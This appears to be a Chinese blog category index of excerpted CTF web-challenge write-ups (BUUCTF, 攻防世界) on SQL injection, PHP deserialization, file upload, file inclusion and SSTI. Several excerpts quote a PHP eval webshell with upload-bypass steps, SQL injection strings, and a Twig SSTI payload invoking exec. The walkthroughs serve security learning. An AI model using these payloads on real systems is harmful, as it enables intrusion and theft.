CTF-WEB
文章平均质量分 59
CTF练习题里的WEB方向
若丶时光破灭
这个作者很懒,什么都没留下…
展开
-
BUUCTF之[WUSTCTF2020]朴实无华 --------------- MD5碰撞
启动挑战页面访问一下robots.txt看看有没有什么提示发现有个可疑的链接:/fAke_f1agggg.php到这里就可以看到重要的源码了<img src="/img.jpg"><?phpheader('Content-type:text/html;charset=utf-8');error_reporting(0);highlight_file(__file__);//level 1if (isset($_GET['num'])){ $num .原创 2021-10-07 20:24:49 · 679 阅读 · 0 评论 -
BUUCTF之[GXYCTF2019]BabySQli
题目这题看到这个页面,而且题目上说的。给人的感觉就是个SQL注入题。。。。启动BurpSuite抓包看看有两个可疑点:一是报用户错误(wrong user!),通常如果有这种错误的时候要先爆破账号,得到正确的账号后再去爆破密码。这里返回的绿色部分明显是加密后的数据首先提取绿色部分的信息,经过排查发现可以先base32解密,再base64原数据:MMZFM422K5HDASKDN5TVU3SKOZRFGQRRMMZFM6KJJBSG6WSYJJWESSCWPJNFQSTVLFLTC3C原创 2021-10-03 22:33:13 · 2334 阅读 · 0 评论 -
BUUCTF之[ZJCTF 2019]NiZhuanSiWei -------------- php和data伪协议,和反序列化
BUUCTF之[ZJCTF 2019]NiZhuanSiWei知识点: PHP伪协议php://filterdata://题目: <?php $text = $_GET["text"];$file = $_GET["file"];$password = $_GET["password"];if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){ echo "<原创 2021-07-17 10:41:35 · 536 阅读 · 3 评论 -
BUUCTF之[Zer0pts2020]Can you guess it? basename函数绕过
BUUCTF之[Zer0pts2020]Can you guess it? basename函数绕过题目后台PHP源码:<?phpinclude 'config.php'; // FLAG is defined in config.phpif (preg_match('/config\.php\/*$/i', $_SERVER['PHP_SELF'])) { exit("I don't know what you are thinking, but I won't let you原创 2021-07-14 12:45:16 · 745 阅读 · 2 评论 -
BUUCTF之[BSidesCF 2019]Kookie ------cookie注入
BUUCTF之[BSidesCF 2019]Kookie ------cookie注入题目原创 2021-06-28 13:49:36 · 321 阅读 · 0 评论 -
BUUCTF之[MRCTF2020]套娃 --- 文件包含漏洞
BUUCTF之[MRCTF2020]套娃题目发现什么都没有,于是鼠标右键查看一下提示。可以看到PHP代码<?php//1st$query = $_SERVER['QUERY_STRING']; if( substr_count($query, '_') !== 0 || substr_count($query, '%5f') != 0 ){ die('Y0u are So cutE!');} if($_GET['b_u_p_t'] !== '23333' &原创 2021-06-27 18:47:15 · 707 阅读 · 0 评论 -
BUUCTF之[强网杯 2019]随便注 -------堆叠查询
BUUCTF之[强网杯 2019]随便注 -------堆叠查询题目一开始以为这个是简单的SQL注入,结果是堆叠查询。。。。关于堆叠查询有几个要记的知识点:show databases; //显示所有数据库show tables; // 显示所有表名show columns from 【表名】; // 显示对应表名里列的信息desc 【表名】; // 显示详细的表名信息·注意这里的表名需要用到反单引号,即`1919810931原创 2021-07-16 19:53:49 · 218 阅读 · 1 评论 -
BUUCTF之[极客大挑战 2019]PHP ------ PHP的序列化/反序列化
BUUCTF之[极客大挑战 2019]PHP ------ PHP的序列化/反序列化提示我们有备份网站,最终在www.zip下找到这个备份文件。将它下载下来,可以得到index.php,class.php和flag.php。首先是flag.php,这里面虽然有flag。但是这个flag是假的。<?php$flag = 'Syc{dog_dog_dog_dog}';?>然后就是index.php,你打开它后会发现它是WEB界面的那个代码。最后,想要拿到真正的flag。需要从cla原创 2021-07-27 11:23:02 · 421 阅读 · 0 评论 -
BUUCTF之[watevrCTF-2019]Cookie Store
BUUCTF之[watevrCTF-2019]Cookie Store打开挑战页面发现它说你初始基金是50,但是购买flag需要100然后参考源码和访问robots.txt都没有发现什么重要的信息,所以就用BurpSuite抓包试试看…一开始是以为在id里面试试注入的,但是随便输入一些信息都没有看到什么可疑的,但是后来注意到cookie那里有个很像base64的加密,所以解密试试看有什么东西结果发现!!!所以payload:eyJtb25leSI6IDEwMCwgImhpc3Rvcnki原创 2021-07-30 15:52:10 · 325 阅读 · 0 评论 -
BUUCTF之[GYCTF2020]Blacklist--------堆叠查询
BUUCTF之[GYCTF2020]Blacklist--------堆叠查询启动挑战项目,发现前端界面显示Black list is so weak for you,isn’t it又是一道用堆叠查询的题目,看来CTF也很喜欢考这类型的题目呀!首先爆出数据库:1’;show databases;然后爆出表名:1’; show tables;然后显示某个表里面列的信息:1’;show columns from FlagHere;接下来的才是重点,在MYSQL数据库中:可以用handl原创 2021-06-19 16:41:52 · 628 阅读 · 0 评论 -
BUUCTF之[GXYCTF2019]禁止套娃 ------GitHack源码泄露
BUUCTF之[GXYCTF2019]禁止套娃 ------GitHack源码泄露知识点GitHack源码泄露localeconv() 函数返回一包含本地数字及货币格式信息的数组。老实说,这道题我根本不会做。但是里面有好几处知识点我之前都没有接触过,所以先做下记录,,,...原创 2021-07-27 21:39:46 · 343 阅读 · 0 评论 -
BUUCTF之[MRCTF2020]你传你呢-------文件解析漏洞
BUUCTF之[MRCTF2020]你传你????呢虽然这题对于大佬来说是属于简单题。但是对于我这种小白来说却是第一次见。算是学到东西了。所以在此记录一下,以后看到这种类似的题目也可以回来复习。。。首先,启动挑战的项目emmmmmmm这个页面很有个性。。。一开始以为只是个简单的文件上传漏洞,结果没做出来。不管怎么样,先上传一句话木马。并且将下面的内容保存成文件1.pngGIF89a? <script language="php">eval($_POST['zyh']);</s原创 2021-06-19 11:38:54 · 8859 阅读 · 8 评论 -
BUUCTF之[极客大挑战 2019]BabySQL 解决方法
BUUCTF之[极客大挑战 2019]BabySQL 解决方法启动我们的挑战项目emmmmm这是第三个SQL注入,应该难度又提高了一些。先试试我们的万能密码:1’ or 1=1 #不行,报错了。而且我也看不出报错的信息是什么然后返回前面的题目看看提示信息,觉得可能这题是加了一些过滤信息所以我们试试双写看看能不能绕过防御,并且把最后面的 # 号改成 %23。所以我们的payload为:1’ oorr 1=1 %23发现可以获取到信息,说明我们这个方法是正确的!然后我们再进行用ord原创 2021-06-17 23:45:45 · 1863 阅读 · 1 评论 -
BUUCTF之[极客大挑战 2019]BuyFlag 解题过程
BUUCTF之[极客大挑战 2019]BuyFlag 解题过程启动我们的挑战项目鼠标右键查看一下源代码。发现有两个跳转链接:index.php和pay.php。经过排查,最终锁定在pay.php这个页面(而且题目也说了BuyFlag)。打开pay.php页面后是这样子的然后再用BurpSuite抓包看看,并把抓到的包发送到Repeater模块…老实说,这道题我在这里被卡了很久很久。最终是看了别人的WP才知道要把user=0改成user=1。(之前做的其它CTF题中也是要把user的值从0改原创 2021-06-18 12:39:32 · 686 阅读 · 0 评论 -
BUUCTF之[ACTF2020 新生赛]BackupFile 解题过程
在PHP中:==为弱相等,即当整数和字符串类型相比较时。会先将字符串转化为整数然后再进行比较。比如a=123和b=123admin456进行==比较时。则b会只截取前面的整数部分。即b=123。所以,这里的a==b是返回True。原创 2021-06-18 11:53:45 · 4407 阅读 · 11 评论 -
BUUCTF之[GXYCTF2019]BabyUpload-------文件解析漏洞
BUUCTF之[GXYCTF2019]BabyUpload-------文件解析漏洞(.htaccess)早上遇到一个文件解析漏洞,下午又遇到一个。。。。好吧,看来文件解析漏洞在CTF中也是很重要的一个知识点!!!首先启动挑战项目先正常的上传一句话木马:GIF89a?<script language="php">eval($_POST['zyh']);</script>我经常用这样的一句话木马,为了防止php文件内容被过滤啥的…所以,把传输的文件名改回1.pn原创 2021-06-19 17:32:28 · 1821 阅读 · 0 评论 -
i春秋之爆破-2 -------- 文件读取
题目知识点:PHP文件读取函数利用Linux读取文件的函数(一)PHP中文件读取的几个函数:freadfgetsfgetssfilereadfilefile_get_contentsshow_source参考来源:https://www.jb51.net/article/53266.htm(二)利用Linux读取文件的函数systemexecshell_execpassthrupopen参考来源: https://bbs.ichunqiu.com/foru原创 2021-09-19 17:06:32 · 975 阅读 · 0 评论 -
攻防世界之unserialize3 ---------- 反序列化
攻防世界之unserialize3 ---------- 反序列化打开页面,果然。。。而且看起来挺简单的!class xctf{public $flag = '111';public function __wakeup(){exit('bad requests');}?code=所以开始构造payload:O:4:"xctf":1:{s:4:"flag";s:3:"111";}但是这里还有个小问题…如果直接用上面那个payload你会发现它被拦下。原因是__wakeup()这个函数p原创 2021-07-24 22:50:28 · 376 阅读 · 3 评论 -
BUUCTF之[极客大挑战 2019]HardSQL ----报错注入extractvalue和updatexml
BUUCTF之[极客大挑战 2019]HardSQL ----报错注入extractvalue和updatexml题目经过手工测试可以发现过滤:and,/**/,空格,等于号(=),大于号(>)和联合查询union等多个关键词一般来说,SQL注入有这4个步骤:爆数据库:select database()爆数据表:select group_concat(table_name) from information_schema.tables where table_schema=databas原创 2021-07-27 00:30:04 · 531 阅读 · 0 评论 -
BUUCTF之[MRCTF2020]Ez_bypass md5数组绕过
BUUCTF之[MRCTF2020]Ez_bypass md5数组绕过启动项目后可以查看到后台代码,但是是乱的~~~鼠标右键可以查看到整洁的代码I put something in F12 for youinclude 'flag.php';$flag='MRCTF{xxxxxxxxxxxxxxxxxxxxxxxxx}';if(isset($_GET['gg'])&&isset($_GET['id'])) { $id=$_GET['id']; $gg=$_GE原创 2021-06-19 12:33:27 · 720 阅读 · 0 评论 -
BUUCTF之[NPUCTF2020]ReadlezPHP------反序列化
BUUCTF之[NPUCTF2020]ReadlezPHP------反序列化题目发现无法使用鼠标右键打开源代码,所以可以手动添加**view-source:**来显示页面源代码。往下拉可以看到可疑的源代码,访问这个链接<?php#error_reporting(0);class HelloPhp{ public $a; public $b; public function __construct(){ $this->a = "Y-m-原创 2021-06-23 17:41:00 · 988 阅读 · 0 评论 -
BUUCTF之[b01lers2020]Welcome to Earth
BUUCTF之[b01lers2020]Welcome to Earth一开始查看源码和访问robots.txt都没有看到可用的信息,但是后来观察到浏览器上多访问了一个目录/die/,于是把它去看看能访问什么这时候在查看源代码,可以看到有可疑的链接/chase/用浏览器访问/chase/发现很快又跳转回来,所以用BurpSuite抓包访问完/door/的时候,突然就找不到突破口了。这里一直卡了很久。后来看别人的WP才知道要访问这里的/static/js/door.jsJav原创 2021-07-31 13:54:46 · 1062 阅读 · 0 评论 -
BUUCTF之[CISCN2019 华东南赛区]Web11 ------ SSTI注入
BUUCTF之[CISCN2019 华东南赛区]Web11知识点SSTIsmartyX-Forwarded-For题目于是开始BurpSuite抓包和添加X-Forwarded-For:127.0.0.1emmmmmm其实一开始添加完这个就不知道怎么做了,后来去看了别人的WP有提示SSTI和smarty这两个词。心想,这个不是最近才做过类似的题目嘛。。。哎!我居然没想到!所以开始尝试一下:X-Forwarded-For:{7*8}获取当前目录有那些文件:X-Forwarded-F原创 2021-06-23 21:07:36 · 1478 阅读 · 0 评论 -
BUUCTF之[ACTF2020 新生赛]Include
BUUCTF之[ACTF2020 新生赛]Include启动项目,进入到我们的挑战页面这个有个tips链接,点开它发现并没有什么可用的信息,然后试试右键打开源代码和访问robots.txt协议都没有看到什么特别的信息。然后就开始想是不是该用dirsearch扫描一下这个网址看看可不可以扫描出什么来。但是又返回到题目去,看到了Include这个字眼。就想起了,这个题目可能是和文件包含相关。。。打开火狐的Hackbar,导入链接emmmmmmmmmm好的,那么现在开始输入文件包含里经常用到的方原创 2021-06-13 19:21:41 · 419 阅读 · 2 评论 -
BUUCTF之[BJDCTF2020]Cookie is so stable ----- SSTI注入
BUUCTF之[BJDCTF2020]Cookie is so stable题目知识点:服务端模板注入攻击。SSTI里的Twig攻击。从网上找来的图片。参考链接:服务端模板注入攻击然后网上提示说:输入{{7*‘7’}},返回49表示是 Twig 模块输入{{7*‘7’}},返回7777777表示是 Jinja2 模块然后这题是 Twig 模块,用到的payload是:{{_self.env.registerUndefinedFilterCallback("exec")}}{{_sel原创 2021-06-26 10:32:17 · 1523 阅读 · 0 评论 -
BUUCTF之[BJDCTF2020]The mystery of ip ----- SSTI注入
BUUCTF之[BJDCTF2020]The mystery of ip题目知识点SSTIsmartyX-Forwarded-For右键查看源代码,发现有3个可疑的链接:index.php,flag.php,hint.php最后经过测试定位到flag.php这个页面,结果发现有提示IP地址啥。所以盲猜可能是和XFF(X-Forwarded-For)相关的题目通过BurpSuite抓包改一下数据看看好吧,一度陷入了深思。。。于是跑去看了看别人的WP。发现这题涉及到SSTI和sma原创 2021-06-21 17:27:49 · 202 阅读 · 0 评论 -
BUUCTF之[BSidesCF 2019]Futurella
BUUCTF之[BSidesCF 2019]Futurella右键查看源代码就可以看到flag了这题简单的让人无语…原创 2021-07-31 17:18:33 · 489 阅读 · 0 评论 -
CTF题 BUUCTF之[极客大挑战 2019]Knife 1
CTF题 BUUCTF之[极客大挑战 2019]Knife 1启动我们的挑战项目这里的题目简直就是在提示我们用中国菜刀连接,但是由于个人习惯这里我就用中国蚁剑来连接了。(其实中国蚁剑和中国菜刀的功能差不多,不过个人感觉蚁剑更好用一些吧)。现在来打开我们的蚁剑工具然后填上我们的连接和密码:Syc然后进入到对方的登录后台最后到这个后台的根目录下就可以找到flag值如果你不能一下子就看出来是用蚁剑这些工具来连接,那可能是因为你做题的经验还不够。做多了自然而然就能想到了。总的来说,这题属于原创 2021-06-17 12:05:07 · 3028 阅读 · 1 评论 -
攻防世界之baby_web
攻防世界之baby_web打开挑战页面发现就只有HELLO WORLD,其它什么也没有。。。但是题目有给我们提示这个,所以访问一下index.php看看有没有什么但是访问index.php页面后,它又返回到原来的那个页面。所以猜测这里有问题!于是就用BurpSuite抓包看看,flag就出来了其实一开始并没有看到,后来找了很久才注意到。果然要细心细心。。。。...原创 2021-07-24 21:56:28 · 154 阅读 · 1 评论 -
BUUCTF之[网鼎杯 2020 朱雀组]phpweb ------- 反序列化
BUUCTF之[网鼎杯 2020 朱雀组]phpweb ------- 反序列化题目Warning: date(): It is not safe to rely on the system’s timezone settings. You are required to use the date.timezone setting or the date_default_timezone_set() function. In case you used any of those methods and原创 2021-06-25 18:13:59 · 705 阅读 · 0 评论 -
攻防世界之warmup
攻防世界之warmupsource.php源码: <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist = ["source"=>"source.php","hint"=>"hint.php"]; if (! isset($page原创 2021-07-29 14:11:20 · 181 阅读 · 0 评论 -
CTF中的BUUCTF之[ACTF2020 新生赛]Upload
CTF中的BUUCTF之[ACTF2020 新生赛]Upload启动我们的挑战项目好吧,不管怎么看都是文件上传类型的题目。那么我们就用我经常用的一句话木马吧:GIF89a? <script language="php">eval($_POST['zyh']);</script>然后将上面的内容改成1.png。然后上传我们的1.png(别忘记了要打开BurpSuite来进行抓包)。将BurpSuite抓到的包发送到Repeater模块然后把文件名1.png改成1.原创 2021-06-17 17:59:31 · 460 阅读 · 0 评论 -
CTF---BUUCTF之[极客大挑战 2019]LoveSQL 1
CTF练习题里的BUUCTF之[极客大挑战 2019]LoveSQL 1启动我们的挑战项目,这题一看就知道是SQL注入了。。。而且跟上一次做的好像,不知道这一次的难不难。先来随便输入个“万能钥匙”吧!1’ or 1=1 #嗯哼?这个是MD5加密吗?上网找一下MD5在线加解密的网站:https://www.cmd5.com/。看看能不能得到我们想要的答案果然没解出来,照理说CTF的题不会这么简单。这个可能是一个陷阱,或者是另外一种解法(反正我不会…)。所以,我们试试正常的解题思路吧!先用原创 2021-06-17 11:34:53 · 1461 阅读 · 0 评论 -
BUUCTF之[MRCTF2020]PYWebsite
BUUCTF之[MRCTF2020]PYWebsite知识点X-Forwarded-Forclient-ip题目先用BurpSuite抓包用X-Forwarded-For来改一下IP地址原创 2021-06-22 18:01:57 · 176 阅读 · 0 评论 -
BUUCTF之[极客大挑战 2019]Secret File--------文件包含和密码文件
BUUCTF之[极客大挑战 2019]Secret File--------文件包含和密码文件启动我们的项目,看到挑战的页面右键查看网页的源代码 看到一个可疑的链接,我们访问它:./Archive_room.php。然后出现以下新的页面,我们根据提示访问它看看会出现什么… 啊啊啊???什么?就没别的提示了吗? 不急,我们看看源代码。好吧源代码什么也没有。但是根据上一个页面的提示:**没看清楚?回去再仔细看看吧。**这句话很可疑,是不是提示我们说那里有个重定向,导致页面跳转的太快所原创 2021-06-13 22:08:13 · 991 阅读 · 3 评论 -
CTF中的BUUCTF之[极客大挑战 2019]Upload
CTF中的BUUCTF之[极客大挑战 2019]Upload启动我们的挑战项目这个界面,一看就知道是文件上传的类型的题目了所以用我之前准备好的一句话木马:GIF89a? <script language="php">eval($_POST['zyh']);</script>之所以用这种一句话木马,是因为这种过滤方法比原版的:<?php @eval($_POST['attack']);?> 要好用。(个人观点)将上面的一句话木马保存为1.png。然后开原创 2021-06-17 17:38:17 · 565 阅读 · 0 评论 -
攻防世界之upload1 -----文件上传漏洞
攻防世界之upload1题目文件上传漏洞,所以上传一句话木马…GIF89a? <script language="php">eval($_POST['zyh']);</script>一开始是直接上传php文件,但是发现它会被拦下没关系,那就先改成文件后缀名,然后用BurpSuite抓包!然后再用BurpSuite改一下后缀名就可以了(改成php文件)最后再用蚁剑链接就可以得到Flag了...原创 2021-07-24 23:14:34 · 306 阅读 · 2 评论 -
攻防世界之Training-WWW-Robots
攻防世界之Training-WWW-Robots所以一打开挑战页面就访问robots.txt页面,结果提示我们访问fl0g.php所以继续访问fl0g.php页面,Flag就出来了!原创 2021-07-24 22:02:36 · 59 阅读 · 1 评论 -
BUUCTF之[BSidesCF 2020]Had a bad day --- 文件包含漏洞
BUUCTF之[BSidesCF 2020]Had a bad day题目点击下面的那两个按钮的时候,发现图片会变化。而且链接上的值也是跟着变化。(看上去像是文件包含的题目)点击链接的时候只是category=后面的值改变,使用盲猜是文件包含漏洞。所以试试?category=flag.php好吧,可能是攻击的方式不对。换换其它的:?category=flag.php # 失败?category=flag # 失败?category=php://filter/read=co原创 2021-06-22 16:25:10 · 971 阅读 · 2 评论 -
BUUCTF之[极客大挑战 2019]EasySQL 1
BUUCTF之[极客大挑战 2019]EasySQL 1开启靶机,看到我们的挑战界面这个页面看起来就很像是SQL注入,而且我们的题目也有提示到。。。OK,我们先输入一个万能密码看看~~~账号:1’ or 1=1 # 密码可以随便输入好吧,这题过于简单。。。。。。得到的Flag是:flag{f3bcaef4-f19b-4e56-bf4d-9780988e0b89}...原创 2021-06-13 18:10:01 · 525 阅读 · 0 评论